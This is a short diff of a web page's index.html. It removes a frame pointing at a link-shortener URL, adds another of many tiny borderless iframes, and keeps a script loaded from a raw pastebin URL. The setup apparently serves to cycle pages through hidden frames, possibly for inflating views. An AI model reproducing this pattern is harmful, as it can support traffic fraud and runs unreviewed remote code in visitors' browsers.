--- a/index.html
+++ b/index.html
@@ -2,12 +2,6 @@
 <html>
 <body>
 
-<frameset cols="25%,*,25%">
-  <frame src="http://raboninco.com/9381503/ros">
-</frameset>
-  
-  <iframe src="http://raboninco.com/9381503/ros"></iframe>
-
 <iframe id="a" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 <iframe id="b" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 <iframe id="c" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
@@ -18,8 +12,8 @@
 <iframe id="h" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 <iframe id="i" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 <iframe id="j" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
+<iframe id="k" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>
 
-  <input type='text' placeholder='caca'>popo
-<script src="https://pastebin.com/raw/9d9jmXrd"></script>
+ <script src="https://pastebin.com/raw/9d9jmXrd"></script>
 </body>
 </html>
